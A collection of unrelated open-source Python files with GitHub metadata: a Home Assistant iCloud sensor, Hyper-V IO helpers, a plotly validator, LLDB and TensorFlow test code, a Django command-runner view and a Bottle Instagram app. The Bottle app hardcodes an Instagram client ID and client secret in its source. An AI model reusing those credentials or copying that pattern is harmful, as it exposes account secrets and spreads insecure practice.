"bytes": "305748"
},
{
"name": "MLIR",
"bytes": "20"
},
{
"name": "Makefile",
"bytes": "61284"
},
{
"name": "Python",
"bytes": "5635857"
},
{
"name": "R",
"bytes": "3038"
},
{
"name": "SCSS",
"bytes": "33487"
},
{
"name": "Scala",
"bytes": "5050997"
},
{
"name": "Shell",
"bytes": "75539"
},
{
"name": "XSLT",
"bytes": "5748"
}
],
"symlink_target": ""
}
|
"""Support for iCloud sensors."""
from __future__ import annotations
from typing import Any
from homeassistant.components.sensor import SensorDeviceClass, SensorEntity
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import PERCENTAGE
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.icon import icon_for_battery_level
from .account import IcloudAccount, IcloudDevice
from .const import DOMAIN
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities
) -> None:
"""Set up device tracker for iCloud component."""
account = hass.data[DOMAIN][entry.unique_id]
tracked = set()
@callback
def update_account():
"""Update the values of the account."""
add_entities(account, async_add_entities, tracked)
account.listeners.append(
async_dispatcher_connect(hass, account.signal_device_new, update_account)
)
update_account()
@callback
def add_entities(account, async_add_entities, tracked):
"""Add new tracker entities from the account."""
new_tracked = []
for dev_id, device in account.devices.items():
if dev_id in tracked or device.battery_level is None:
continue
new_tracked.append(IcloudDeviceBatterySensor(account, device))
tracked.add(dev_id)
if new_tracked:
async_add_entities(new_tracked, True)
class IcloudDeviceBatterySensor(SensorEntity):
"""Representation of a iCloud device battery sensor."""
_attr_device_class = SensorDeviceClass.BATTERY
_attr_native_unit_of_measurement = PERCENTAGE
def __init__(self, account: IcloudAccount, device: IcloudDevice) -> None:
"""Initialize the battery sensor."""
self._account = account
self._device = device
self._unsub_dispatcher = None
@property
def unique_id(self) -> str:
"""Return a unique ID."""
return f"{self._device.unique_id}_battery"
@property
def name(self) -> str:
"""Sensor name."""
return f"{self._device.name} battery state"
@property
def native_value(self) -> int:
"""Battery state percentage."""
return self._device.battery_level
@property
def icon(self) -> str:
"""Battery state icon handling."""
return icon_for_battery_level(
battery_level=self._device.battery_level,
charging=self._device.battery_status == "Charging",
)
@property
def extra_state_attributes(self) -> dict[str, Any]:
"""Return default attributes for the iCloud device entity."""
return self._device.extra_state_attributes
@property
def device_info(self) -> DeviceInfo:
"""Return the device information."""
return DeviceInfo(
configuration_url="https://icloud.com/",
identifiers={(DOMAIN, self._device.unique_id)},
manufacturer="Apple",
model=self._device.device_model,
name=self._device.name,
)
@property
def should_poll(self) -> bool:
"""No polling needed."""
return False
async def async_added_to_hass(self):
"""Register state update callback."""
self._unsub_dispatcher = async_dispatcher_connect(
self.hass, self._account.signal_device_update, self.async_write_ha_state
)
async def async_will_remove_from_hass(self):
"""Clean up after entity before removal."""
self._unsub_dispatcher()
|
{
"content_hash": "820f4366fc752e3f2579922f0588fad8",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 84,
"avg_line_length": 31.23076923076923,
"alnum_prop": 0.6603721948549535,
"repo_name": "home-assistant/home-assistant",
"id": "bf5ff5860e3b6d9d01d8296aa8e86caa494a443e",
"size": "3654",
"binary": false,
"copies": "1",
"ref": "refs/heads/dev",
"path": "homeassistant/components/icloud/sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20557383"
},
{
"name": "Shell",
"bytes": "6671"
}
],
"symlink_target": ""
}
|
import ctypes
import struct
import sys
from eventlet import patcher
from nova.i18n import _
from oslo_log import log as logging
from oslo_utils import units
from hyperv.nova import constants
from hyperv.nova import vmutils
LOG = logging.getLogger(__name__)
Queue = patcher.original('Queue')
if sys.platform == 'win32':
from ctypes import wintypes
kernel32 = ctypes.windll.kernel32
class OVERLAPPED(ctypes.Structure):
_fields_ = [
('Internal', wintypes.ULONG),
('InternalHigh', wintypes.ULONG),
('Offset', wintypes.DWORD),
('OffsetHigh', wintypes.DWORD),
('hEvent', wintypes.HANDLE)
]
def __init__(self):
self.Offset = 0
self.OffsetHigh = 0
LPOVERLAPPED = ctypes.POINTER(OVERLAPPED)
LPOVERLAPPED_COMPLETION_ROUTINE = ctypes.WINFUNCTYPE(
None, wintypes.DWORD, wintypes.DWORD, LPOVERLAPPED)
kernel32.ReadFileEx.argtypes = [
wintypes.HANDLE, wintypes.LPVOID, wintypes.DWORD,
LPOVERLAPPED, LPOVERLAPPED_COMPLETION_ROUTINE]
kernel32.WriteFileEx.argtypes = [
wintypes.HANDLE, wintypes.LPCVOID, wintypes.DWORD,
LPOVERLAPPED, LPOVERLAPPED_COMPLETION_ROUTINE]
FILE_FLAG_OVERLAPPED = 0x40000000
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 3
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
FORMAT_MESSAGE_ALLOCATE_BUFFER = 0x00000100
FORMAT_MESSAGE_IGNORE_INSERTS = 0x00000200
INVALID_HANDLE_VALUE = -1
WAIT_FAILED = 0xFFFFFFFF
WAIT_FINISHED = 0
ERROR_PIPE_BUSY = 231
ERROR_PIPE_NOT_CONNECTED = 233
ERROR_NOT_FOUND = 1168
WAIT_PIPE_DEFAULT_TIMEOUT = 5 # seconds
WAIT_IO_COMPLETION_TIMEOUT = 2 * units.k
WAIT_INFINITE_TIMEOUT = 0xFFFFFFFF
IO_QUEUE_TIMEOUT = 2
IO_QUEUE_BURST_TIMEOUT = 0.05
class HyperVIOError(vmutils.HyperVException):
msg_fmt = _("IO operation failed while executing "
"Win32 API function %(func_name)s. "
"Error code: %(error_code)s. "
"Error message %(error_message)s.")
def __init__(self, error_code=None, error_message=None,
func_name=None):
self.error_code = error_code
message = self.msg_fmt % {'func_name': func_name,
'error_code': error_code,
'error_message': error_message}
super(HyperVIOError, self).__init__(message)
class IOUtils(object):
"""Asyncronous IO helper class."""
def _run_and_check_output(self, func, *args, **kwargs):
"""Convenience helper method for running Win32 API methods."""
# A list of return values signaling that the operation failed.
error_codes = kwargs.pop('error_codes', [0])
ignored_error_codes = kwargs.pop('ignored_error_codes', None)
ret_val = func(*args, **kwargs)
if ret_val in error_codes:
func_name = func.__name__
self.handle_last_error(func_name=func_name,
ignored_error_codes=ignored_error_codes)
return ret_val
def handle_last_error(self, func_name=None, ignored_error_codes=None):
error_code = kernel32.GetLastError()
kernel32.SetLastError(0)
if ignored_error_codes and error_code in ignored_error_codes:
return
message_buffer = ctypes.c_char_p()
kernel32.FormatMessageA(
FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER |
FORMAT_MESSAGE_IGNORE_INSERTS,
None, error_code, 0, ctypes.byref(message_buffer), 0, None)
error_message = message_buffer.value
kernel32.LocalFree(message_buffer)
raise HyperVIOError(error_code=error_code,
error_message=error_message,
func_name=func_name)
def wait_named_pipe(self, pipe_name, timeout=WAIT_PIPE_DEFAULT_TIMEOUT):
"""Wait a given ammount of time for a pipe to become available."""
self._run_and_check_output(kernel32.WaitNamedPipeW,
ctypes.c_wchar_p(pipe_name),
timeout * units.k)
def open(self, path, desired_access=None, share_mode=None,
creation_disposition=None, flags_and_attributes=None):
error_codes = [INVALID_HANDLE_VALUE]
handle = self._run_and_check_output(kernel32.CreateFileW,
ctypes.c_wchar_p(path),
desired_access,
share_mode,
None,
creation_disposition,
flags_and_attributes,
None,
error_codes=error_codes)
return handle
def cancel_io(self, handle, overlapped_structure=None):
"""Cancels pending IO on specified handle."""
# Ignore errors thrown when there are no requests
# to be canceled.
ignored_error_codes = [ERROR_NOT_FOUND]
self._run_and_check_output(kernel32.CancelIoEx,
handle,
overlapped_structure,
ignored_error_codes=ignored_error_codes)
def close_handle(self, handle):
self._run_and_check_output(kernel32.CloseHandle, handle)
def _wait_io_completion(self, event):
self._run_and_check_output(kernel32.WaitForSingleObjectEx,
event, WAIT_INFINITE_TIMEOUT,
True, error_codes=[WAIT_FAILED])
def set_event(self, event):
self._run_and_check_output(kernel32.SetEvent, event)
def _reset_event(self, event):
self._run_and_check_output(kernel32.ResetEvent, event)
def _create_event(self, event_attributes=None, manual_reset=True,
initial_state=False, name=None):
return self._run_and_check_output(kernel32.CreateEventW,
event_attributes, manual_reset,
initial_state, name,
error_codes=[None])
def get_completion_routine(self, callback=None):
def _completion_routine(error_code, num_bytes, lpOverLapped):
"""Sets the completion event and executes callback, if passed."""
overlapped = ctypes.cast(lpOverLapped, LPOVERLAPPED).contents
self.set_event(overlapped.hEvent)
if callback:
callback(num_bytes)
return LPOVERLAPPED_COMPLETION_ROUTINE(_completion_routine)
def get_new_overlapped_structure(self):
"""Structure used for asyncronous IO operations."""
# Event used for signaling IO completion
hEvent = self._create_event()
overlapped_structure = OVERLAPPED()
overlapped_structure.hEvent = hEvent
return overlapped_structure
def read(self, handle, buff, num_bytes,
overlapped_structure, completion_routine):
self._reset_event(overlapped_structure.hEvent)
self._run_and_check_output(kernel32.ReadFileEx,
handle, buff, num_bytes,
ctypes.byref(overlapped_structure),
completion_routine)
self._wait_io_completion(overlapped_structure.hEvent)
def write(self, handle, buff, num_bytes,
overlapped_structure, completion_routine):
self._reset_event(overlapped_structure.hEvent)
self._run_and_check_output(kernel32.WriteFileEx,
handle, buff, num_bytes,
ctypes.byref(overlapped_structure),
completion_routine)
self._wait_io_completion(overlapped_structure.hEvent)
def get_buffer(self, buff_size):
return (ctypes.c_ubyte * buff_size)()
def get_buffer_data(self, buff, num_bytes):
data = "".join([struct.pack('B', b)
for b in buff[:num_bytes]])
return data
def write_buffer_data(self, buff, data):
for i, c in enumerate(data):
buff[i] = struct.unpack('B', c)[0]
class IOQueue(Queue.Queue):
def __init__(self, client_connected):
Queue.Queue.__init__(self)
self._client_connected = client_connected
def get(self, timeout=IO_QUEUE_TIMEOUT, continue_on_timeout=True):
while self._client_connected.isSet():
try:
return Queue.Queue.get(self, timeout=timeout)
except Queue.Empty:
if continue_on_timeout:
continue
else:
break
def put(self, item, timeout=IO_QUEUE_TIMEOUT):
while self._client_connected.isSet():
try:
return Queue.Queue.put(self, item, timeout=timeout)
except Queue.Full:
continue
def get_burst(self, timeout=IO_QUEUE_TIMEOUT,
burst_timeout=IO_QUEUE_BURST_TIMEOUT,
max_size=constants.SERIAL_CONSOLE_BUFFER_SIZE):
# Get as much data as possible from the queue
# to avoid sending small chunks.
data = self.get(timeout=timeout)
while data and not (len(data) > max_size):
chunk = self.get(timeout=burst_timeout,
continue_on_timeout=False)
if chunk:
data += chunk
else:
break
return data
|
{
"content_hash": "d2bccf54e28e649a5eac7b2c80b820aa",
"timestamp": "",
"source": "github",
"line_count": 263,
"max_line_length": 77,
"avg_line_length": 37.08365019011407,
"alnum_prop": 0.575207628422024,
"repo_name": "adelina-t/compute-hyperv",
"id": "bde10254e578afe2e2fefc18d61ef5eee8fdb015",
"size": "10392",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "hyperv/nova/ioutils.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "685121"
}
],
"symlink_target": ""
}
|
import _plotly_utils.basevalidators
class ExponentformatValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(
self,
plotly_name="exponentformat",
parent_name="barpolar.marker.colorbar",
**kwargs,
):
super(ExponentformatValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "colorbars"),
values=kwargs.pop("values", ["none", "e", "E", "power", "SI", "B"]),
**kwargs,
)
|
{
"content_hash": "4ab1a2d64665df0c20531bae489d26ff",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 80,
"avg_line_length": 33.1764705882353,
"alnum_prop": 0.5797872340425532,
"repo_name": "plotly/plotly.py",
"id": "ded52c3fb65e7be5741f07d1be33a55e8129dbc5",
"size": "564",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "packages/python/plotly/plotly/validators/barpolar/marker/colorbar/_exponentformat.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "545"
},
{
"name": "JavaScript",
"bytes": "2074"
},
{
"name": "PostScript",
"bytes": "565328"
},
{
"name": "Python",
"bytes": "31506317"
},
{
"name": "TypeScript",
"bytes": "71337"
}
],
"symlink_target": ""
}
|
import bottle
from os import environ
from bottle import route, post, run, request, view
from instagram import client, subscriptions
bottle.debug(True)
CONFIG = {
'client_id': '27e229137db647e7a4af91f1d1ba6105',
'client_secret': 'f8900228cca14a72a41fbd2a02d9f0f8',
'redirect_uri': 'http://instacerberus.herokuapp.com/oauth_callback'
}
unauthenticated_api = client.InstagramAPI(**CONFIG)
def process_tag_update(update):
print update
reactor = subscriptions.SubscriptionsReactor()
reactor.register_callback(subscriptions.SubscriptionType.TAG, process_tag_update)
@route('/test')
@view('index')
def test():
return dict()
@route('/')
def home():
try:
url = unauthenticated_api.get_authorize_url(scope=["likes" , "comments"])
return '<a href="%s">Connect with Instagram</a>' % url
except Exception, e:
print e
@route('/oauth_callback')
@view('index')
def on_callback():
code = request.GET.get("code")
if not code:
return 'Missing code'
try:
access_token = unauthenticated_api.exchange_code_for_access_token(code)
if not access_token:
return 'Could not get access token'
api = client.InstagramAPI(access_token=access_token[0])
tag = api.tag(tag_name='piccollage')
return dict(count=tag.media_count, token=access_token[0])
except Exception, e:
print e
@route('/realtime_callback')
@post('/realtime_callback')
def on_realtime_callback():
mode = request.GET.get("hub.mode")
challenge = request.GET.get("hub.challenge")
verify_token = request.GET.get("hub.verify_token")
if challenge:
return challenge
else:
x_hub_signature = request.header.get('X-Hub-Signature')
raw_response = request.body.read()
try:
reactor.process(CONFIG['client_secret'], raw_response, x_hub_signature)
except subscriptions.SubscriptionVerifyError:
print "Signature mismatch"
run(host='0.0.0.0', port=int(environ.get("PORT", 5000)), reloader=True)
|
{
"content_hash": "ace7600941794dab99f93e28e923c4e6",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 83,
"avg_line_length": 30.46268656716418,
"alnum_prop": 0.6731994120529152,
"repo_name": "bearprada/instagram-tag-monitor",
"id": "908493c66b6323abf9162be8f002f106d5fb9338",
"size": "2041",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "39894"
}
],
"symlink_target": ""
}
|
"""
Test lldb data formatter subsystem.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class SyntheticFilterRecomputingTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Find the line number to break at.
self.line = line_number('main.m', '// Set break point at this line.')
@skipUnlessDarwin
def test_rdar12437442_with_run_command(self):
"""Test that we update SBValues correctly as dynamic types change."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self, "main.m", self.line, num_expected_locations=1, loc_exact=True)
self.runCmd("run", RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
# This is the function to remove the custom formats in order to have a
# clean slate for the next test case.
def cleanup():
self.runCmd('type format clear', check=False)
self.runCmd('type summary clear', check=False)
self.runCmd('type synth clear', check=False)
# Execute the cleanup function during test case tear down.
self.addTearDownHook(cleanup)
# Now run the bulk of the test
id_x = self.dbg.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame().FindVariable("x")
id_x.SetPreferDynamicValue(lldb.eDynamicCanRunTarget)
id_x.SetPreferSyntheticValue(True)
if self.TraceOn():
self.runCmd("expr --dynamic-type run-target --ptr-depth 1 -- x")
self.assertTrue(
id_x.GetSummary() == '@"5 elements"',
"array does not get correct summary")
self.runCmd("next")
self.runCmd("frame select 0")
id_x = self.dbg.GetSelectedTarget().GetProcess(
).GetSelectedThread().GetSelectedFrame().FindVariable("x")
id_x.SetPreferDynamicValue(lldb.eDynamicCanRunTarget)
id_x.SetPreferSyntheticValue(True)
if self.TraceOn():
self.runCmd("expr --dynamic-type run-target --ptr-depth 1 -- x")
self.assertTrue(
id_x.GetNumChildren() == 7,
"dictionary does not have 7 children")
id_x.SetPreferSyntheticValue(False)
self.assertFalse(
id_x.GetNumChildren() == 7,
"dictionary still looks synthetic")
id_x.SetPreferSyntheticValue(True)
self.assertTrue(
id_x.GetSummary() == "7 key/value pairs",
"dictionary does not get correct summary")
|
{
"content_hash": "9862d6004c4d530ee85cddc8bd367f7f",
"timestamp": "",
"source": "github",
"line_count": 83,
"max_line_length": 85,
"avg_line_length": 35.10843373493976,
"alnum_prop": 0.6228551818805765,
"repo_name": "endlessm/chromium-browser",
"id": "e9e570eda5862791717147317f07cda2f2df2e6a",
"size": "2914",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "third_party/llvm/lldb/test/API/functionalities/data-formatter/synthupdate/TestSyntheticFilterRecompute.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
from django.core.management import find_management_module, find_commands, load_command_class
from django.core.management.base import handle_default_options
from django.conf import settings
from django.http import HttpResponse, Http404, HttpResponsePermanentRedirect, HttpResponseRedirect
from django.template import Context, loader, RequestContext
from forms import CommandArgsForm
import StringIO
from management.decorators import redirect_stderr_stdout
import sys
from utils import on_production_server
from django.http import Http404
from django.core.urlresolvers import reverse
from django.utils.functional import wraps
# Some commands need to be excludes beacause I can not implement those or does no make sense like run server
EXCLUDED_COMMANDS = ['runserver','deploy','remote','dbshell','startapp','startproject','compilemessages','runfcgi','shell','makemessages']
OVERWRITE_COMMANDS = ['django.contrib.auth:changepassword',]
def only_admin(view):
@wraps(view)
def inner(*args, **kwargs):
if on_production_server:
from google.appengine.api import users
if not users.get_current_user():
return HttpResponseRedirect(users.create_login_url(reverse("commands")))
else:
if users.is_current_user_admin():
return view(*args, **kwargs)
raise Http404("User is not admin")
else:
return view(*args, **kwargs)
return inner
@only_admin
def commands(request):
template = loader.get_template('djangoappengine_rdbms/commands.html')
_commands = {}
#import debugger; debugger.pdb().set_trace()
for app_name in settings.INSTALLED_APPS + ["django.core"]:
try:
command_names = find_commands(find_management_module(app_name))
for command_name in command_names:
if command_name not in EXCLUDED_COMMANDS:
if "%s:%s" % (app_name, command_name) not in OVERWRITE_COMMANDS:
_commands[command_name] = {'command_name':command_name,'app_name':app_name}
except ImportError:
pass
#import debugger; debugger.pdb().set_trace()
_commands = _commands.values()
_commands.sort(key=lambda x: x['command_name'])
context = {'commands':_commands}
return HttpResponse(template.render(RequestContext(request,context)))
@only_admin
def command_details(request, app_name, command_name):
command = load_command_class(app_name, command_name)
template = loader.get_template('djangoappengine_rdbms/command_details.html')
#
stdout = StringIO.StringIO()
stderr = StringIO.StringIO()
@redirect_stderr_stdout(stdout=stdout,stderr=stderr)
def _execute_command(command, command_name, stdout, stderr, argv):
parser = command.create_parser("manage.py", command_name)
options, argss = parser.parse_args(argv.split())
handle_default_options(options)
options.__dict__["stdout"] = stdout
options.__dict__["stderr"] = stderr
options.__dict__['interactive'] = False
#import debugger; debugger.pdb().set_trace()
try:
return command.execute(*argss, **options.__dict__)
except SystemExit, e:
pass
except Exception, e:
stderr.write(e)
if request.POST:
form = CommandArgsForm(request.POST, command=command)
if form.is_valid():
ret = _execute_command(command, command_name, stdout=stdout, stderr=stderr, argv = form.cleaned_data.get("args"))
else:
form = CommandArgsForm(command=command)
stdout.seek(0)
stderr.seek(0)
#import debugger; debugger.pdb().set_trace()
context = { 'command':command,
'command_name':command_name,
'app_name':app_name,
'form':form,
'stdout':stdout.read(),
'stderr':stderr.read(),
}
return HttpResponse(template.render(RequestContext(request,context)))
|
{
"content_hash": "5ea6a9748283474b4c327e07f1800180",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 138,
"avg_line_length": 34.63559322033898,
"alnum_prop": 0.6459505749938831,
"repo_name": "danpetrikin/djangoappengine_rdbms",
"id": "b482bddeaaa337b75a297b9069c669735f41f97b",
"size": "4087",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "75958"
}
],
"symlink_target": ""
}
|
class NoSSLEnvironment:
ssl_enabled = False
def __init__(self, *args, **kwargs):
pass
def __enter__(self):
return self
def __exit__(self, *args, **kwargs):
pass
def host_cert_path(self, hosts):
return None, None
def ca_cert_path(self, hosts):
return None
|
{
"content_hash": "9f1c91ffdec6a18bf53f154fa7d267f8",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 40,
"avg_line_length": 19.058823529411764,
"alnum_prop": 0.5493827160493827,
"repo_name": "chromium/chromium",
"id": "d5f913735a5dd073ea40c6153dde8a29e9e1ca51",
"size": "352",
"binary": false,
"copies": "13",
"ref": "refs/heads/main",
"path": "third_party/wpt_tools/wpt/tools/wptserve/wptserve/sslutils/base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
}
|
"""Base testing class for strategies that require multiple nodes."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import copy
import threading
import numpy as np
_portpicker_import_error = None
try:
import portpicker # pylint: disable=g-import-not-at-top
except ImportError as _error: # pylint: disable=invalid-name
_portpicker_import_error = _error
portpicker = None
# pylint: disable=g-import-not-at-top
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import session
from tensorflow.python.estimator import run_config
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
ASSIGNED_PORTS = set()
lock = threading.Lock()
def pick_unused_port():
"""Returns an unused and unassigned local port."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
global ASSIGNED_PORTS
with lock:
while True:
port = portpicker.pick_unused_port()
if port > 10000 and port not in ASSIGNED_PORTS:
ASSIGNED_PORTS.add(port)
logging.info('Using local port %r', port)
return port
def _create_cluster(num_workers,
num_ps,
has_chief=False,
has_eval=False,
protocol='grpc',
worker_config=None,
ps_config=None):
"""Creates and starts local servers and returns the cluster_spec dict."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [pick_unused_port() for _ in range(num_workers)]
ps_ports = [pick_unused_port() for _ in range(num_ps)]
cluster_dict = {}
if num_workers > 0:
cluster_dict['worker'] = ['localhost:%s' % port for port in worker_ports]
if num_ps > 0:
cluster_dict['ps'] = ['localhost:%s' % port for port in ps_ports]
if has_eval:
cluster_dict['evaluator'] = ['localhost:%s' % pick_unused_port()]
if has_chief:
cluster_dict['chief'] = ['localhost:%s' % pick_unused_port()]
cs = server_lib.ClusterSpec(cluster_dict)
for i in range(num_workers):
server_lib.Server(
cs,
job_name='worker',
protocol=protocol,
task_index=i,
config=worker_config,
start=True)
for i in range(num_ps):
server_lib.Server(
cs,
job_name='ps',
protocol=protocol,
task_index=i,
config=ps_config,
start=True)
if has_chief:
server_lib.Server(
cs,
job_name='chief',
protocol=protocol,
task_index=0,
config=worker_config,
start=True)
if has_eval:
server_lib.Server(
cs,
job_name='evaluator',
protocol=protocol,
task_index=0,
config=worker_config,
start=True)
return cluster_dict
def create_in_process_cluster(num_workers,
num_ps,
has_chief=False,
has_eval=False):
"""Create an in-process cluster that consists of only standard server."""
# Leave some memory for cuda runtime.
gpu_mem_frac = 0.7 / (num_workers + int(has_chief) + int(has_eval))
worker_config = config_pb2.ConfigProto()
worker_config.gpu_options.per_process_gpu_memory_fraction = gpu_mem_frac
# Enable collective ops which has no impact on non-collective ops.
# TODO(yuefengz, tucker): removing this after we move the initialization of
# collective mgr to the session level.
if has_chief:
worker_config.experimental.collective_group_leader = (
'/job:chief/replica:0/task:0')
else:
worker_config.experimental.collective_group_leader = (
'/job:worker/replica:0/task:0')
ps_config = config_pb2.ConfigProto()
ps_config.device_count['GPU'] = 0
# Create in-process servers. Once an in-process tensorflow server is created,
# there is no way to terminate it. So we create one cluster per test process.
# We could've started the server in another process, we could then kill that
# process to terminate the server. The reasons why we don't want multiple
# processes are
# 1) it is more difficult to manage these processes;
# 2) there is something global in CUDA such that if we initialize CUDA in the
# parent process, the child process cannot initialize it again and thus cannot
# use GPUs (https://stackoverflow.com/questions/22950047).
return _create_cluster(
num_workers,
num_ps=num_ps,
has_chief=has_chief,
has_eval=has_eval,
worker_config=worker_config,
ps_config=ps_config,
protocol='grpc')
def create_cluster_spec(has_chief=False,
num_workers=1,
num_ps=0,
has_eval=False):
"""Create a cluster spec with tasks with unused local ports."""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
cluster_spec = {}
if has_chief:
cluster_spec['chief'] = ['localhost:%s' % pick_unused_port()]
if num_workers:
cluster_spec['worker'] = [
'localhost:%s' % pick_unused_port() for _ in range(num_workers)
]
if num_ps:
cluster_spec['ps'] = [
'localhost:%s' % pick_unused_port() for _ in range(num_ps)
]
if has_eval:
cluster_spec['evaluator'] = ['localhost:%s' % pick_unused_port()]
return cluster_spec
class MultiWorkerTestBase(test.TestCase):
"""Base class for testing multi node strategy and dataset."""
@classmethod
def setUpClass(cls):
"""Create a local cluster with 2 workers."""
cls._cluster_spec = create_in_process_cluster(num_workers=2, num_ps=0)
cls._default_target = 'grpc://' + cls._cluster_spec['worker'][0]
def setUp(self):
# We only cache the session in one test because another test may have a
# different session config or master target.
self._thread_local = threading.local()
self._thread_local.cached_session = None
self._result = 0
self._lock = threading.Lock()
@contextlib.contextmanager
def session(self, graph=None, config=None, target=None):
"""Create a test session with master target set to the testing cluster.
Creates a test session that connects to the local testing cluster.
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
target: the target of session to connect to.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
config = self._create_config(config)
if target is None:
target = self._default_target
with session.Session(graph=graph, config=config, target=target) as sess:
yield sess
@contextlib.contextmanager
# TODO(b/117573461): Overwrite self.evaluate() to use this function.
def cached_session(self, graph=None, config=None, target=None):
"""Create a test session with master target set to the testing cluster.
Creates a test session that connects to the local testing cluster.
The session is only created once per test and then reused.
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
target: the target of session to connect to.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case. Note that the
session will live until the end of the test.
"""
config = self._create_config(config)
if target is None:
target = self._default_target
if getattr(self._thread_local, 'cached_session', None) is None:
self._thread_local.cached_session = session.Session(
graph=None, config=config, target=target)
sess = self._thread_local.cached_session
with sess.graph.as_default(), sess.as_default():
yield sess
def _create_config(self, config):
if config is None:
config = config_pb2.ConfigProto(allow_soft_placement=True)
else:
config = copy.deepcopy(config)
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
def _run_client(self, client_fn, task_type, task_id, num_gpus, *args,
**kwargs):
result = client_fn(task_type, task_id, num_gpus, *args, **kwargs)
if np.all(result):
with self._lock:
self._result += 1
def _run_between_graph_clients(self, client_fn, cluster_spec, num_gpus, *args,
**kwargs):
"""Runs several clients for between-graph replication.
Args:
client_fn: a function that needs to accept `task_type`, `task_id`,
`num_gpus` and returns True if it succeeds.
cluster_spec: a dict specifying jobs in a cluster.
num_gpus: number of GPUs per worker.
*args: will be passed to `client_fn`.
**kwargs: will be passed to `client_fn`.
"""
threads = []
for task_type in [run_config.TaskType.CHIEF, run_config.TaskType.WORKER]:
for task_id in range(len(cluster_spec.get(task_type, []))):
t = threading.Thread(
target=self._run_client,
args=(client_fn, task_type, task_id, num_gpus) + args,
kwargs=kwargs)
t.start()
threads.append(t)
for t in threads:
t.join()
self.assertEqual(self._result, len(threads))
|
{
"content_hash": "9714e6e86ae612e2a5e0c7db82aa3d22",
"timestamp": "",
"source": "github",
"line_count": 291,
"max_line_length": 80,
"avg_line_length": 34.13745704467354,
"alnum_prop": 0.6550231528085363,
"repo_name": "hehongliang/tensorflow",
"id": "8eec3dc0f6ec0676353c7434d203e017b9aab80d",
"size": "10623",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/contrib/distribute/python/multi_worker_test_base.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "7666"
},
{
"name": "C",
"bytes": "194748"
},
{
"name": "C++",
"bytes": "26947133"
},
{
"name": "CMake",
"bytes": "174938"
},
{
"name": "Go",
"bytes": "908627"
},
{
"name": "Java",
"bytes": "323804"
},
{
"name": "Jupyter Notebook",
"bytes": "1833659"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "37293"
},
{
"name": "Objective-C",
"bytes": "7056"
},
{
"name": "Objective-C++",
"bytes": "63210"
},
{
"name": "Protocol Buffer",
"bytes": "249901"
},
{
"name": "PureBasic",
"bytes": "24932"
},
{
"name": "Python",
"bytes": "22872386"
},
{
"name": "Ruby",
"bytes": "327"
},
{
"name": "Shell",
"bytes": "336334"
}
],
"symlink_target": ""
}
|
import os
import sys
from os.path import dirname, join
from setuptools import setup, find_packages, Command
# Hack because logging + setuptools sucks.
import multiprocessing
def fread(fn):
with open(join(dirname(__file__), fn), 'r') as f:
return f.read()
if sys.version_info[0] == 3:
tests_require = ['nose', 'pycrypto']
else:
